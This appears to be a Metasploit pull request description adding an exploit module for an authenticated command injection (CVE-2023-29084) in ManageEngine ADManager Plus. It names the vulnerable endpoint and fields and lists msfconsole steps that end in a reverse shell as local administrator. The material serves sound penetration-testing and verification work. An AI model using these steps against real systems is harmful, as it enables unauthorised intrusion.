rapid7/metasploit-framework
# Add in CVE-2023-29084 - Zoho ManageEngine ADManager Plus ChangePasswordAction Authenticated Command Injection

Fixes #18000 

AdManager Plus prior to build 7181 allows authenticated users to exploit a command injection in the `USERNAME` or `PASSWORD` fields of the `params` parameter when making a POST request to `/api/json/admin/saveServerSettings`. This can be exploited to gain access to the host machine as the use running ADManager Plus, which will typically be the local administrator.

## Verification

1. Set up a Windows Server target as a domain controller server.
2. Download https://web.archive.org/web/20220926012908if_/https://download.manageengine.com/products/ad-manager/13024552/ManageEngine_ADManager_Plus_64.exe onto the target and run through the setup window, accepting defaults.
3. Start msfconsole and `use exploit/windows/http/manageengine_admanager_plus_cve_2023_29084_auth_cmd_injection`
4. `set RHOST *target IP*`
5. `set LHOST *local IP address*`
6. `set SRVHOST *local IP address*` <- This step is optional depending on payload.
7. `exploit`
8. You should get a shell back as the local administrator user on the target machine.
